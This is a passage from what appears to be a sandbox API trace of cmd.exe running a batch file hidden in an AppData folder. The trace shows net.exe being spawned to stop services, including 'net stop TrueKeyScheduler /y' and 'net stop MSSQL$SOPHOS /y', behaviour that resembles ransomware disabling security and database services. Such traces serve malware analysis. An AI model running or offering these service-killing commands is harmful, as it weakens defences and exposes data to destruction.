lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.220] GetLastError () returned 0x2 [0214.220] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.220] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.220] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.221] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.221] GetLastError () returned 0x2 [0214.221] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.221] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.222] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.222] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0214.222] SetErrorMode (uMode=0x0) returned 0x1 [0214.222] GetProcessHeap () returned 0x3e0000 [0214.223] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0214.223] GetProcessHeap () returned 0x3e0000 [0214.223] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0214.223] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.223] GetProcessHeap () returned 0x3e0000 [0214.223] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0214.223] GetProcessHeap () returned 0x3e0000 [0214.223] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0214.223] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0214.223] GetProcessHeap () returned 0x3e0000 [0214.223] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0214.224] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.224] GetProcessHeap () returned 0x3e0000 [0214.224] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0214.224] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0214.224] GetProcessHeap () returned 0x3e0000 [0214.224] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0214.224] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.225] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.225] GetLastError () returned 0x2 [0214.225] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.225] GetLastError () returned 0x2 [0214.226] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.226] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0214.226] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0214.227] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.227] GetLastError () returned 0x2 [0214.227] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0214.227] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0214.228] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.228] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0214.228] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0214.228] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0214.228] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.229] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop TrueKeyScheduler /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop TrueKeyScheduler /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop TrueKeyScheduler /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x5d8, dwThreadId=0x438)) returned 1 [0214.233] CloseHandle (hObject=0x74) returned 1 [0214.233] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.233] GetProcessHeap () returned 0x3e0000 [0214.233] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.233] GetEnvironmentStringsW () returned 0x3f8408* [0214.233] GetProcessHeap () returned 0x3e0000 [0214.233] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.233] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.233] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0214.379] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0214.379] CloseHandle (hObject=0x78) returned 1 [0214.380] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0214.380] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0214.380] GetProcessHeap () returned 0x3e0000 [0214.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.380] GetEnvironmentStringsW () returned 0x3f8408* [0214.380] GetProcessHeap () returned 0x3e0000 [0214.380] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.380] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.380] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.380] GetProcessHeap () returned 0x3e0000 [0214.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.380] GetEnvironmentStringsW () returned 0x3f8408* [0214.380] GetProcessHeap () returned 0x3e0000 [0214.381] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.381] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.381] GetProcessHeap () returned 0x3e0000 [0214.381] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0214.381] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0214.381] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.381] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.381] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0214.381] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.381] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0214.381] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.382] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0214.382] SetConsoleInputExeNameW () returned 0x1 [0214.382] GetConsoleOutputCP () returned 0x1b5 [0214.382] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0214.382] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0214.382] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0214.382] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.382] SetFilePointer (in: hFile=0x78, lDistanceToMove=5463, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1557 [0214.382] GetProcessHeap () returned 0x3e0000 [0214.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0214.383] GetProcessHeap () returned 0x3e0000 [0214.383] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0214.383] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.383] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1557 [0214.383] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x36a, lpOverlapped=0x0) returned 1 [0214.383] SetFilePointer (in: hFile=0x78, lDistanceToMove=5489, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1571 [0214.383] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$SOPHOS /y\r\n/y\r\n /y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 26 [0214.384] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.384] GetFileType (hFile=0x78) returned 0x1 [0214.384] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.384] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1571 [0214.384] GetProcessHeap () returned 0x3e0000 [0214.384] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0214.384] GetProcessHeap () returned 0x3e0000 [0214.384] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0214.387] _tell (_FileHandle=3) returned 5489 [0214.387] _close (_FileHandle=3) returned 0 [0214.388] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0214.388] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0214.388] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0214.388] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0214.388] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0214.388] _wcsicmp (_String1="net", _String2="CD") returned 11 [0214.388] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0214.388] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0214.388] _wcsicmp (_String1="net", _String2="REN") returned -4 [0214.388] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0214.388] _wcsicmp (_String1="net", _String2="SET") returned -5 [0214.388] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0214.388] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0214.388] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0214.388] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0214.388] _wcsicmp (_String1="net", _String2="MD") returned 1 [0214.388] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0214.388] _wcsicmp (_String1="net", _String2="RD") returned -4 [0214.388] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0214.388] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0214.388] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0214.388] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0214.388] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0214.388] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0214.388] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0214.388] _wcsicmp (_String1="net", _String2="VER") returned -8 [0214.388] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0214.388] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0214.388] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0214.388] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0214.388] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0214.388] _wcsicmp (_String1="net", _String2="START") returned -5 [0214.388] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0214.388] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0214.388] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0214.388] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0214.389] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0214.389] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0214.389] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0214.389] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0214.389] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0214.389] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0214.389] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0214.389] SetErrorMode (uMode=0x0) returned 0x1 [0214.389] GetProcessHeap () returned 0x3e0000 [0214.389] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0214.389] GetProcessHeap () returned 0x3e0000 [0214.389] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0214.390] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.390] GetProcessHeap () returned 0x3e0000 [0214.390] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0214.390] GetProcessHeap () returned 0x3e0000 [0214.390] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0214.390] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0214.390] GetProcessHeap () returned 0x3e0000 [0214.390] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0214.390] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.390] GetProcessHeap () returned 0x3e0000 [0214.390] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0214.391] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0214.391] GetProcessHeap () returned 0x3e0000 [0214.391] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0214.391] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.391] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.392] GetLastError () returned 0x2 [0214.392] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.392] GetLastError () returned 0x2 [0214.392] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.393] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.393] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.394] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.394] GetLastError () returned 0x2 [0214.394] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.394] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.395] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.395] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0214.395] SetErrorMode (uMode=0x0) returned 0x1 [0214.395] GetProcessHeap () returned 0x3e0000 [0214.395] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0214.395] GetProcessHeap () returned 0x3e0000 [0214.395] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0214.396] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.396] GetProcessHeap () returned 0x3e0000 [0214.396] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0214.396] GetProcessHeap () returned 0x3e0000 [0214.396] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0214.396] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0214.396] GetProcessHeap () returned 0x3e0000 [0214.396] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0214.396] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.396] GetProcessHeap () returned 0x3e0000 [0214.396] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0214.397] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0214.397] GetProcessHeap () returned 0x3e0000 [0214.397] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0214.397] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.397] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.398] GetLastError () returned 0x2 [0214.398] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.398] GetLastError () returned 0x2 [0214.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.399] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0214.399] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0214.399] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.400] GetLastError () returned 0x2 [0214.400] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0214.400] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0214.400] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.401] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0214.401] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0214.401] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0214.401] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.401] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$SOPHOS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$SOPHOS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$SOPHOS /y", 